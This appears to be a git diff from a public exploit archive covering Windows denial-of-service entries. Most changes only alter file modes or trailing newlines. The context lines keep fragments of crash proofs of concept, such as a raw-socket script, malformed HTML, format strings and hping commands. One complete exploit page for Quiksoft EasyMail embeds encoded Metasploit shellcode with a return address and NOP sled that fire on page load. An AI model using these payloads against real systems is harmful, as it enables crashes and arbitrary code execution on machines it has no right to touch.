41 42 43 44 00 00 01 ff -------------------------------------------------------- \ No newline at end of file +------------------------------------------------------- \ No newline at end of file diff --git a/platforms/windows/dos/25255.txt b/platforms/windows/dos/25255.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/25259.py b/platforms/windows/dos/25259.py index 0406e0839..2debfaa9f 100755 --- a/platforms/windows/dos/25259.py +++ b/platforms/windows/dos/25259.py @@ -12,4 +12,4 @@ import socket s=socket.socket(socket.AF_INET,socket.SOCK_RAW,4) s.sendto("",("x.x.x.x",0)) -Press ENTER and your win box should crash immediately. \ No newline at end of file +Press ENTER and your win box should crash immediately. \ No newline at end of file diff --git a/platforms/windows/dos/25268.txt b/platforms/windows/dos/25268.txt old mode 100755 new mode 100644 index ce7b04ef3..68ac86bf0 --- a/platforms/windows/dos/25268.txt +++ b/platforms/windows/dos/25268.txt @@ -8,4 +8,4 @@ It should be noted that the exploitation of this vulnerability may require the a Microsoft Windows XP Service Pack 1 is affected by this issue. -Tsshutdn 0 /SERVER:yyyzzz /DELAY:0 \ No newline at end of file +Tsshutdn 0 /SERVER:yyyzzz /DELAY:0 \ No newline at end of file diff --git a/platforms/windows/dos/25281.py b/platforms/windows/dos/25281.py index 8269c52b1..8e7b8f33b 100755 --- a/platforms/windows/dos/25281.py +++ b/platforms/windows/dos/25281.py @@ -13,4 +13,4 @@ b=a[:n]+"\xff\xc4\x02\x11\x00\xff\xff"+"\x00"*14+"\x01"*510 +a[n+2+struct.unpack("!H",a[n+2:n+4])[0]:] f=open(raw_input("enter the path to the output file:\n"),"wb") f.write(b) -f.close() \ No newline at end of file +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/25326.txt b/platforms/windows/dos/25326.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/25329.cfg b/platforms/windows/dos/25329.cfg old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/25364.txt b/platforms/windows/dos/25364.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/25443.txt b/platforms/windows/dos/25443.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/25611.txt b/platforms/windows/dos/25611.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/25631.txt b/platforms/windows/dos/25631.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/25633.txt b/platforms/windows/dos/25633.txt old mode 100755 new mode 100644 index fedb396eb..cdd4ff438 --- a/platforms/windows/dos/25633.txt +++ b/platforms/windows/dos/25633.txt @@ -8,4 +8,4 @@ Reports indicate that the issue manifests because of a buffer overflow condition A remote attacker may leverage this condition to crash a target AOL Instant Messenger client. Other attacks may also be possible. -"DO NOT COPY AND PASTE OR IT WILL CRASH U" <fontsml=.>..<font sml= .></font> \ No newline at end of file +"DO NOT COPY AND PASTE OR IT WILL CRASH U" <fontsml=.>..<font sml= .></font> \ No newline at end of file diff --git a/platforms/windows/dos/25658.txt b/platforms/windows/dos/25658.txt old mode 100755 new mode 100644 index 0c967fc30..5429b8769 --- a/platforms/windows/dos/25658.txt +++ b/platforms/windows/dos/25658.txt @@ -7,4 +7,4 @@ A remote user can cause Yahoo! Messenger to disconnect through malicious emails This issue is reported to affect Yahoo! Messenger versions 5.x to 6.0 Windows; other versions on other operating systems may also be affected. <a href="YMSGR:%63%68%61%74%3F:::%26%26%26%26">Click Here</a> -<a href="YMSGR:Chat?:::%26%26%26%26">Click Here</a> \ No newline at end of file +<a href="YMSGR:Chat?:::%26%26%26%26">Click Here</a> \ No newline at end of file diff --git a/platforms/windows/dos/25680.txt b/platforms/windows/dos/25680.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/25699.txt b/platforms/windows/dos/25699.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/25712.txt b/platforms/windows/dos/25712.txt old mode 100755 new mode 100644 index e4b31cb23..b435139e8 --- a/platforms/windows/dos/25712.txt +++ b/platforms/windows/dos/25712.txt @@ -131,5 +131,4 @@ As attachment, code to reproduce the crash. <script language='javascript'> //obj.SetItemReadOnly(0x61616161,false); obj.SetItemReadOnly(0x61616161,true); -</script> - \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/windows/dos/25714.txt b/platforms/windows/dos/25714.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/25719.txt b/platforms/windows/dos/25719.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/25737.txt b/platforms/windows/dos/25737.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/25782.txt b/platforms/windows/dos/25782.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/25921.txt b/platforms/windows/dos/25921.txt old mode 100755 new mode 100644 index f9fdf4b8b..8b26aa720 --- a/platforms/windows/dos/25921.txt +++ b/platforms/windows/dos/25921.txt @@ -6,4 +6,4 @@ The problem presents itself specifically when the affected server application re An attacker may leverage this issue to cause an affected server to crash, denying service to legitimate users. -/ignore 123456789 \ No newline at end of file +/ignore 123456789 \ No newline at end of file diff --git a/platforms/windows/dos/25991.txt b/platforms/windows/dos/25991.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/25992.txt b/platforms/windows/dos/25992.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/26139.txt b/platforms/windows/dos/26139.txt old mode 100755 new mode 100644 index 2ffbf1cf6..0fdc2fd26 --- a/platforms/windows/dos/26139.txt +++ b/platforms/windows/dos/26139.txt @@ -25,4 +25,4 @@ All versions of Gaim 1.x are considered vulnerable at the moment. %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n -%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n \ No newline at end of file +%n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n %n \ No newline at end of file diff --git a/platforms/windows/dos/26173.txt b/platforms/windows/dos/26173.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/26194.txt b/platforms/windows/dos/26194.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/26216.txt b/platforms/windows/dos/26216.txt old mode 100755 new mode 100644 index b79f6af82..5da2b37fd --- a/platforms/windows/dos/26216.txt +++ b/platforms/windows/dos/26216.txt @@ -20,4 +20,4 @@ while(obj1.GetServerStatus() != "Logged In"); //wait till login obj1.RenameGroup("Friends", buf, 5); -[/script] \ No newline at end of file +[/script] \ No newline at end of file diff --git a/platforms/windows/dos/26219.c b/platforms/windows/dos/26219.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/26220.c b/platforms/windows/dos/26220.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2625.c b/platforms/windows/dos/2625.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2629.html b/platforms/windows/dos/2629.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/26301.txt b/platforms/windows/dos/26301.txt old mode 100755 new mode 100644 index e49256b49..2f7799833 --- a/platforms/windows/dos/26301.txt +++ b/platforms/windows/dos/26301.txt @@ -7,4 +7,4 @@ The attacker may leverage this issue to corrupt process memory, which may lead t GroupWise 6.5.3 is reported to be vulnerable. It is possible that other versions are affected as well. The following value is sufficient to trigger this issue: -11111111111111111111111111111111 \ No newline at end of file +11111111111111111111111111111111 \ No newline at end of file diff --git a/platforms/windows/dos/26341.txt b/platforms/windows/dos/26341.txt old mode 100755 new mode 100644 index 1db8980d7..767980766 --- a/platforms/windows/dos/26341.txt +++ b/platforms/windows/dos/26341.txt @@ -11,4 +11,4 @@ Update: Microsoft reports several systems have experienced one or more problems IDENTIFY 3 3 DST_IP:DST_PORT/ANYID - PUSH SOMESTRING PREPARE -RECONNECT \ No newline at end of file +RECONNECT \ No newline at end of file diff --git a/platforms/windows/dos/26450.pl b/platforms/windows/dos/26450.pl index 50cb49641..9f143520f 100755 --- a/platforms/windows/dos/26450.pl +++ b/platforms/windows/dos/26450.pl @@ -33,5 +33,4 @@ $SOCKET = IO::Socket::INET->new(Proto=>'TCP', $SOCKET->send($PAYLOAD); -close($SOCKET); - \ No newline at end of file +close($SOCKET); \ No newline at end of file diff --git a/platforms/windows/dos/26457.txt b/platforms/windows/dos/26457.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2650.c b/platforms/windows/dos/2650.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/26517.txt b/platforms/windows/dos/26517.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/26555.txt b/platforms/windows/dos/26555.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/26557.txt b/platforms/windows/dos/26557.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/26558.txt b/platforms/windows/dos/26558.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/26575.txt b/platforms/windows/dos/26575.txt old mode 100755 new mode 100644 index eab5a7302..9946fb678 --- a/platforms/windows/dos/26575.txt +++ b/platforms/windows/dos/26575.txt @@ -10,4 +10,4 @@ telnet localhost 143 a1 login josh byebye a2 rename foo bar -where josh and byebye are the login credentials for an existing mailbox. \ No newline at end of file +where josh and byebye are the login credentials for an existing mailbox. \ No newline at end of file diff --git a/platforms/windows/dos/26690.c b/platforms/windows/dos/26690.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/26769.txt b/platforms/windows/dos/26769.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/26776.txt b/platforms/windows/dos/26776.txt old mode 100755 new mode 100644 index 1375df244..9f19c9e25 --- a/platforms/windows/dos/26776.txt +++ b/platforms/windows/dos/26776.txt @@ -6,4 +6,4 @@ Successful exploitation will likely result in a crash of the 'SWS.exe' applicati Sights 'n Sounds Streaming Media Server version 2.0.3.b is affected. -http://www.example.com/MediaServerListing.exe?[long_string] \ No newline at end of file +http://www.example.com/MediaServerListing.exe?[long_string] \ No newline at end of file diff --git a/platforms/windows/dos/26779.txt b/platforms/windows/dos/26779.txt old mode 100755 new mode 100644 index 6c400e9ae..1dc88b2de --- a/platforms/windows/dos/26779.txt +++ b/platforms/windows/dos/26779.txt @@ -4,4 +4,4 @@ MDaemon WorldClient is prone to a denial of service vulnerability. This issue is An attacker can exploit this vulnerability to prevent a user from accessing their mail remotely through the WorldClient client application. -<script></script> \ No newline at end of file +<script></script> \ No newline at end of file diff --git a/platforms/windows/dos/26869.txt b/platforms/windows/dos/26869.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/26985.txt b/platforms/windows/dos/26985.txt old mode 100755 new mode 100644 index aec1b9b63..e525ef267 --- a/platforms/windows/dos/26985.txt +++ b/platforms/windows/dos/26985.txt @@ -20,4 +20,4 @@ Crash 2: > <acronym><dd><h5><applet></caption></applet><li></h1> Crash 3: -> <table datasrc="."> \ No newline at end of file +> <table datasrc="."> \ No newline at end of file diff --git a/platforms/windows/dos/27010.txt b/platforms/windows/dos/27010.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27047.txt b/platforms/windows/dos/27047.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27049.txt b/platforms/windows/dos/27049.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27050.txt b/platforms/windows/dos/27050.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27051.txt b/platforms/windows/dos/27051.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27055.txt b/platforms/windows/dos/27055.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27069.txt b/platforms/windows/dos/27069.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2708.c b/platforms/windows/dos/2708.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27082.txt b/platforms/windows/dos/27082.txt old mode 100755 new mode 100644 index b0dc63657..f61fcab7c --- a/platforms/windows/dos/27082.txt +++ b/platforms/windows/dos/27082.txt @@ -7,4 +7,4 @@ This issue presents itself when the browser handles a specially crafted IMG elem An attacker may exploit this issue by enticing a user to visit a malicious site resulting in a denial of service condition in the application. A proof of concept is available: -<table><tr><td><IMG align=left>X X X<?xml:namespace prefix=v ><v:X style="HEIGHT:1"></td></tr></table> \ No newline at end of file +<table><tr><td><IMG align=left>X X X<?xml:namespace prefix=v ><v:X style="HEIGHT:1"></td></tr></table> \ No newline at end of file diff --git a/platforms/windows/dos/27089.c b/platforms/windows/dos/27089.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27090.c b/platforms/windows/dos/27090.c old mode 100755 new mode 100644 index 178026a75..185350024 --- a/platforms/windows/dos/27090.c +++ b/platforms/windows/dos/27090.c @@ -99,5 +99,4 @@ int main(int argc, char **argv) WSACleanup(); return 1; -} - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/dos/27101.txt b/platforms/windows/dos/27101.txt old mode 100755 new mode 100644 index e81d06357..ac4535fa5 --- a/platforms/windows/dos/27101.txt +++ b/platforms/windows/dos/27101.txt @@ -6,4 +6,4 @@ Attackers may trigger a denial of service due to a hang. Note that an attacker m Proof of concept: -hping -2 -s 1025 -p 5727 -d 4097 -a 1.1.1.1 \ No newline at end of file +hping -2 -s 1025 -p 5727 -d 4097 -a 1.1.1.1 \ No newline at end of file diff --git a/platforms/windows/dos/27113.c b/platforms/windows/dos/27113.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27273.txt b/platforms/windows/dos/27273.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27317.txt b/platforms/windows/dos/27317.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27329.txt b/platforms/windows/dos/27329.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27377.txt b/platforms/windows/dos/27377.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27418.txt b/platforms/windows/dos/27418.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27433.txt b/platforms/windows/dos/27433.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27476.txt b/platforms/windows/dos/27476.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/276.delphi b/platforms/windows/dos/276.delphi old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27727.txt b/platforms/windows/dos/27727.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27745.txt b/platforms/windows/dos/27745.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2783.html b/platforms/windows/dos/2783.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27850.txt b/platforms/windows/dos/27850.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2787.c b/platforms/windows/dos/2787.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27906.txt b/platforms/windows/dos/27906.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27930.txt b/platforms/windows/dos/27930.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/27971.txt b/platforms/windows/dos/27971.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28001.c b/platforms/windows/dos/28001.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28049.html b/platforms/windows/dos/28049.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28050.txt b/platforms/windows/dos/28050.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28087.txt b/platforms/windows/dos/28087.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28099.txt b/platforms/windows/dos/28099.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28144.txt b/platforms/windows/dos/28144.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28145.html b/platforms/windows/dos/28145.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28164.html b/platforms/windows/dos/28164.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28169.html b/platforms/windows/dos/28169.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28194.txt b/platforms/windows/dos/28194.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28196.txt b/platforms/windows/dos/28196.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28197.txt b/platforms/windows/dos/28197.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28202.txt b/platforms/windows/dos/28202.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28207.txt b/platforms/windows/dos/28207.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28213.txt b/platforms/windows/dos/28213.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28222.txt b/platforms/windows/dos/28222.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28227.txt b/platforms/windows/dos/28227.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28232.txt b/platforms/windows/dos/28232.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28244.txt b/platforms/windows/dos/28244.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28246.txt b/platforms/windows/dos/28246.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28252.txt b/platforms/windows/dos/28252.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28256.html b/platforms/windows/dos/28256.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28258.txt b/platforms/windows/dos/28258.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28259.txt b/platforms/windows/dos/28259.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28263.c b/platforms/windows/dos/28263.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28265.txt b/platforms/windows/dos/28265.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28266.txt b/platforms/windows/dos/28266.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28286.txt b/platforms/windows/dos/28286.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28301.txt b/platforms/windows/dos/28301.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28341.txt b/platforms/windows/dos/28341.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28343.txt b/platforms/windows/dos/28343.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28369.dpr b/platforms/windows/dos/28369.dpr old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28381.txt b/platforms/windows/dos/28381.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28387.html b/platforms/windows/dos/28387.html old mode 100755 new mode 100644 index 7e5788b84..13169dd49 --- a/platforms/windows/dos/28387.html +++ b/platforms/windows/dos/28387.html @@ -21,4 +21,4 @@ An attacker may exploit this issue to crash Internet Explorer, effectively denyi --!> <html> <body> <object classid="CLSID:{6E3197A3-BBC3-11D4-84C0-00C04F7A06E5}" /object> - </body> </html> \ No newline at end of file + </body> </html> \ No newline at end of file diff --git a/platforms/windows/dos/28389.html b/platforms/windows/dos/28389.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28395.txt b/platforms/windows/dos/28395.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28401.html b/platforms/windows/dos/28401.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28420.htm b/platforms/windows/dos/28420.htm old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28421.htm b/platforms/windows/dos/28421.htm old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28451.txt b/platforms/windows/dos/28451.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28463.html b/platforms/windows/dos/28463.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28469.txt b/platforms/windows/dos/28469.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28513.txt b/platforms/windows/dos/28513.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28588.txt b/platforms/windows/dos/28588.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2860.c b/platforms/windows/dos/2860.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2861.c b/platforms/windows/dos/2861.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28785.c b/platforms/windows/dos/28785.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28822.txt b/platforms/windows/dos/28822.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28834.txt b/platforms/windows/dos/28834.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28855.txt b/platforms/windows/dos/28855.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28860.c b/platforms/windows/dos/28860.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28880.txt b/platforms/windows/dos/28880.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28894.txt b/platforms/windows/dos/28894.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/28897.txt b/platforms/windows/dos/28897.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2901.php b/platforms/windows/dos/2901.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29076.html b/platforms/windows/dos/29076.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2914.php b/platforms/windows/dos/2914.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29148.txt b/platforms/windows/dos/29148.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2916.php b/platforms/windows/dos/2916.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29164.cpp b/platforms/windows/dos/29164.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29170.c b/platforms/windows/dos/29170.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29172.txt b/platforms/windows/dos/29172.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2922.txt b/platforms/windows/dos/2922.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29229.txt b/platforms/windows/dos/29229.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29236.html b/platforms/windows/dos/29236.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29285.txt b/platforms/windows/dos/29285.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29286.txt b/platforms/windows/dos/29286.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29287.txt b/platforms/windows/dos/29287.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2929.cpp b/platforms/windows/dos/2929.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29295.html b/platforms/windows/dos/29295.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29307.c b/platforms/windows/dos/29307.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/2934.php b/platforms/windows/dos/2934.php old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29447.txt b/platforms/windows/dos/29447.txt old mode 100755 new mode 100644 index 7cf7d1f5a..da1bda79e --- a/platforms/windows/dos/29447.txt +++ b/platforms/windows/dos/29447.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to cause denial-of-service conditions and pos This issue affects versions prior to 9.0 SR1. -Winzip32.exe "A" x 5002 \ No newline at end of file +Winzip32.exe "A" x 5002 \ No newline at end of file diff --git a/platforms/windows/dos/2946.html b/platforms/windows/dos/2946.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29463.c b/platforms/windows/dos/29463.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29531.txt b/platforms/windows/dos/29531.txt old mode 100755 new mode 100644 index 8ac233390..13a4915ca --- a/platforms/windows/dos/29531.txt +++ b/platforms/windows/dos/29531.txt @@ -9,4 +9,4 @@ Versions prior to 2.1.0.29 are vulnerable to this issue. 1. Firstname: example example example example ? ( as long as victim cant see the lastname) 2. Lastname: <img src="javascript:alert('Executed from ' + top.location)" > 3. Request to add victim ID to your contact list. -4. Once victim accepts your request, send him a message and change your online status (Available -> Invisible) \ No newline at end of file +4. Once victim accepts your request, send him a message and change your online status (Available -> Invisible) \ No newline at end of file diff --git a/platforms/windows/dos/29536.html b/platforms/windows/dos/29536.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29558.c b/platforms/windows/dos/29558.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/29607.html b/platforms/windows/dos/29607.html old mode 100755 new mode 100644 index 1e1c9d523..a5bbbdf82 --- a/platforms/windows/dos/29607.html +++ b/platforms/windows/dos/29607.html @@ -7,4 +7,4 @@ An attacker can leverage this issue to execute arbitrary code in the context of Versions prior to EasyMail Objects 6.5 are vulnerable. Spam Inspector 4.0.354 is vulnerable. -<html> <head> <title>Quiksoft EasyMail 6.0.3.0 imap connect() stack overflow</title> <script language="JavaScript" defer> function Check() { var buf = 'A'; while (buf.length <= 440) buf = buf + 'A'; // win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + "%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" + "%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" + "%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" + "%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" + "%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" + "%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" + "%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" + "%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" + "%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" + "%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" + "%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" + "%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" + "%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" + "%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" + "%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" + "%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" + "%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" + "%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" + "%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" + "%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" + "%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" + "%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" + "%4e%31%75%74%38%70%65%77%70%43"); var eip = unescape("%0F%DD%17%7D"); // Windows XP SP2 English var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90"); var m = buf + eip + nop + shellcode1 + nop; obj.connect(m); } </script> </head> <body onload="JavaScript: return Check();"> <object id="obj" classid="clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D"> Failed to instantiate object. </object> </body> </html> \ No newline at end of file +<html> <head> <title>Quiksoft EasyMail 6.0.3.0 imap connect() stack overflow</title> <script language="JavaScript" defer> function Check() { var buf = 'A'; while (buf.length <= 440) buf = buf + 'A'; // win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + "%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" + "%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" + "%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" + "%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" + "%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" + "%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" + "%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" + "%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" + "%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" + "%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" + "%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" + "%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" + "%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" + "%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" + "%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" + "%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" + "%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" + "%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" + "%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" + "%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" + "%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" + "%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" + "%4e%31%75%74%38%70%65%77%70%43"); var eip = unescape("%0F%DD%17%7D"); // Windows XP SP2 English var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90"); var m = buf + eip + nop + shellcode1 + nop; obj.connect(m); } </script> </head> <body onload="JavaScript: return Check();"> <object id="obj" classid="clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D"> Failed to instantiate object. </object> </body> </html> \ No newline at end of file diff --git a/platforms/windows/dos/29613.txt b/platforms/windows/dos/29613.txt old mode 100755 new mode 100644 index 